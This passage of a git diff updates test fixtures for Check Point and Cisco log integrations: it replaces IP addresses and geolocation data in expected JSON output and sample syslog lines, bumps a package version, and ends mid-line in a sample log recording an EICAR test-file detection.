__policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"61180\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"10860\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}", @@ -435,22 +438,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 53, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" @@ -486,13 +492,13 @@ "related": { "ip": [ "192.168.2.2", - "8.8.8.8" + "81.2.69.144" ] }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958709500Z", - "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"8.8.8.8\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", + "ingested": "2021-12-09T13:31:19.083347300Z", + "original": "\u003c134\u003e1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; conn_direction:\"Outgoing\"; flags:\"6703366\"; ifdir:\"inbound\"; ifname:\"eth1\"; logid:\"0\"; loguid:\"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; log_delay:\"1585523933\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"55039\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.2.2\"]", "kind": "event", "action": "Accept", "id": "{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}", @@ -523,7 +529,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958716900Z", + "ingested": "2021-12-09T13:31:19.083353400Z", "original": "\u003c134\u003e1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Started\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -549,22 +555,25 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 30148, + "number": 20712, "organization": { - "name": "Sucuri" + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "192.124.249.36" + "ip": "81.2.69.144" }, "rule": { "uuid": "1fde807b-6300-4b1a-914f-f1c1f3e2e7d2" @@ -607,13 +616,13 @@ "related": { "ip": [ "192.168.1.100", - "192.124.249.36" + "81.2.69.144" ] }, "event": { "sequence": 2, - "ingested": "2021-06-30T09:24:17.958724200Z", - "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.124.249.36\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", + "ingested": "2021-12-09T13:31:19.083357600Z", + "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; nat_addtnl_rulenum:\"0\"; nat_rulenum:\"0\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"51894\"; service:\"80\"; service_id:\"http\"; src:\"192.168.1.100\"; xlatedport:\"0\"; xlatedst:\"0.0.0.0\"; xlatesport:\"11157\"; xlatesrc:\"0.0.0.0\"]", "kind": "event", "action": "Accept", "id": "{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}", @@ -681,7 +690,7 @@ }, "event": { "sequence": 3, - "ingested": "2021-06-30T09:24:17.958731600Z", + "ingested": "2021-12-09T13:31:19.083362200Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"3\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.1\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"47919\"; service:\"53\"; service_id:\"domain-udp\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -714,7 +723,7 @@ }, "event": { "sequence": 5, - "ingested": "2021-06-30T09:24:17.958739300Z", + "ingested": "2021-12-09T13:31:19.083366500Z", "original": "\u003c134\u003e1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:\"133440\"; ifdir:\"inbound\"; loguid:\"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"5\"; version:\"5\"; comment:\"No update was found\"; description:\"Contracts\"; product:\"Security Gateway/Management\"; status:\"Finished\"; update_service:\"1\"; version:\"1.0\"]", "id": "{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}", "category": [ @@ -783,7 +792,7 @@ }, "event": { "sequence": 13, - "ingested": "2021-06-30T09:24:17.958746800Z", + "ingested": "2021-12-09T13:31:19.083393500Z", "original": "\u003c134\u003e1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"13\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -817,7 +826,7 @@ "event": { "severity": 1, "sequence": 1, - "ingested": "2021-06-30T09:24:17.958754300Z", + "ingested": "2021-12-09T13:31:19.083397600Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"Application Control\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x0,0x6401a8c0,0x108620ab}", @@ -851,7 +860,7 @@ "event": { "severity": 1, "sequence": 2, - "ingested": "2021-06-30T09:24:17.958761700Z", + "ingested": "2021-12-09T13:31:19.083401900Z", "original": "\u003c134\u003e1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:\"166216\"; ifdir:\"outbound\"; loguid:\"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"2\"; version:\"5\"; db_ver:\"20033003\"; description:\"Gateway was updated with database version: 22032001.\"; product:\"URL Filtering\"; severity:\"1\"; update_status:\"updated\"]", "kind": "event", "id": "{0x5e818de4,0x1,0x6401a8c0,0x108620ab}", @@ -920,7 +929,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958768900Z", + "ingested": "2021-12-09T13:31:19.083405700Z", "original": "\u003c134\u003e1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"138\"; service:\"138\"; service_id:\"nbdatagram\"; src:\"192.168.1.1\"]", "kind": "event", "action": "Accept", @@ -944,21 +953,24 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "France", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 2.3387, - "lat": 48.8582 - }, - "country_iso_code": "FR" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 16625, + "number": 20712, "organization": { - "name": "Akamai Technologies, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, "port": 80, - "ip": "2.21.41.118" + "ip": "81.2.69.144" }, "source": { "port": 65488, @@ -989,13 +1001,13 @@ "related": { "ip": [ "192.168.1.100", - "2.21.41.118" + "81.2.69.144" ] }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958776600Z", - "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"2.21.41.118\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", + "ingested": "2021-12-09T13:31:19.083411200Z", + "original": "\u003c134\u003e1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:\"Drop\"; flags:\"425984\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"1\"; loguid:\"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"81.2.69.144\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"65488\"; service:\"80\"; src:\"192.168.1.100\"; tcp_flags:\"FIN-ACK\"; tcp_packet_out_of_state:\"First packet isn't SYN\"]", "kind": "event", "action": "Drop", "id": "{0x5e818e17,0x0,0x6401a8c0,0x108620ab}", @@ -1058,7 +1070,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958783900Z", + "ingested": "2021-12-09T13:31:19.083415400Z", "original": "\u003c134\u003e1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", @@ -1127,7 +1139,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958791Z", + "ingested": "2021-12-09T13:31:19.083419800Z", "original": "\u003c134\u003e1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.255\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"50024\"; service:\"137\"; service_id:\"nbname\"; src:\"192.168.1.196\"]", "kind": "event", "action": "Accept", @@ -1196,7 +1208,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958798300Z", + "ingested": "2021-12-09T13:31:19.083423700Z", "original": "\u003c134\u003e1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"411908\"; ifdir:\"inbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.100\"; inzone:\"External\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"Local\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"6\"; s_port:\"60226\"; service:\"22\"; service_id:\"ssh\"; src:\"192.168.1.205\"]", "kind": "event", "action": "Accept", @@ -1265,7 +1277,7 @@ }, "event": { "sequence": 1, - "ingested": "2021-06-30T09:24:17.958805500Z", + "ingested": "2021-12-09T13:31:19.083428Z", "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 8363 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]", "kind": "event", "action": "Accept", diff --git a/packages/checkpoint/manifest.yml b/packages/checkpoint/manifest.yml index fe9e81c3456..3f2c7396e67 100644 --- a/packages/checkpoint/manifest.yml +++ b/packages/checkpoint/manifest.yml @@ -1,6 +1,6 @@ name: checkpoint title: Check Point -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs from Check Point with Elastic Agent. type: integration diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log index 2b366c25af3..b8814e463d6 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/cisco-ios.log @@ -1,13 +1,13 @@ -Feb 8 04:00:48 198.51.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 198.51.100.197 -> 224.0.0.22, 1 packet -Feb 9 04:00:48 198.51.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 198.51.100.2 -> 224.0.0.2 (20), 1 packet -Feb 10 04:00:48 198.51.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 198.51.100.1 -> 255.255.255.255, 1 packet -May 3 19:11:33 198.51.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2001:DB8::3(1027) -> 2001:DB8:1000::1(22), 9 packets -Jun 20 02:41:40 198.51.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(55250) -> 198.51.100.255(15600), 1 packet -Jun 20 02:41:45 198.51.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 198.51.100.1 -> 198.51.100.2 (3/4), 1 packet -Jun 20 02:42:28 198.51.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(54309) -> 198.51.100.255(15600), 1 packet -Jun 20 02:42:28 198.51.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets -Jun 20 02:42:34 198.51.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(43989) -> 198.51.100.255(15600), 1 packet -Jun 20 02:43:09 198.51.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59832) -> 172.217.10.46(80), 1 packet -Jun 20 02:43:29 198.51.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets -Jun 20 02:43:29 198.51.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets -Jun 20 02:43:30 198.51.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet +Feb 8 04:00:48 192.168.100.2 585917: Feb 8 04:00:47.272: %SEC-6-IPACCESSLOGRP: list 177 denied igmp 192.168.100.197 -> 224.0.0.22, 1 packet +Feb 9 04:00:48 192.168.100.2 585918: Feb 9 04:00:47.272: %SEC-6-IPACCESSLOGSP: list INBOUND-ON-F11 denied igmp 192.168.100.2 -> 224.0.0.2 (20), 1 packet +Feb 10 04:00:48 192.168.100.2 585919: Feb 10 04:00:47.272: %SEC-6-IPACCESSLOGNP: list 171 denied 0 192.168.100.1 -> 255.255.255.255, 1 packet +May 3 19:11:33 192.168.100.2 585920: May 3 19:11:32.619: %IPV6-6-ACCESSLOGP: list ACL-IPv6-E0/0-IN/10 permitted tcp 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(1027) -> 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6(22), 9 packets +Jun 20 02:41:40 192.168.100.2 1663303: Jun 20 02:41:39.326: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(55250) -> 192.168.100.255(15600), 1 packet +Jun 20 02:41:45 192.168.100.2 1663304: Jun 20 02:41:44.921: %SEC-6-IPACCESSLOGDP: list 151 denied icmp 192.168.100.1 -> 192.168.100.2 (3/4), 1 packet +Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -> 192.168.100.255(15600), 1 packet +Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets +Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -> 192.168.100.255(15600), 1 packet +Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -> 81.2.69.144(80), 1 packet +Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets +Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -> 192.168.100.1 (3/3), 32 packets +Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -> 81.2.69.144(80), 1 packet diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log b/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log index 0cc07d2623f..b465e2da68d 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/test-asa.log @@ -1 +1 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 diff --git a/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log b/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log index ad5d5f9ee28..c7b2a67bc4e 100644 --- a/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log +++ b/packages/cisco/_dev/deploy/docker/sample_logs/test-ftd.log @@ -1 +1 @@ -2019-08-16T09:39:03Z firepower %FTD-1-430005: SrcIP: 10.0.1.20, DstIP: 213.211.198.62, SrcPort: 46004, DstPort: 80, Protocol: tcp, FileDirection: Download, FileAction: Malware Cloud Lookup, FileSHA256: 2546dcffc5ad854d4ddc64fbf056871cd5a00f2471cb7a5bfd4ac23b6e9eedad, SHA_Disposition: Unavailable, SperoDisposition: Spero detection not performed on file, ThreatName: Win.Ransomware.Eicar::95.sbx.tg, FileName: eicar_com.zip, FileType: ZIP, FileSize: 184, ApplicationProtocol: HTTP, Client: cURL, User: No Authentication Required, FirstPacketSecond: 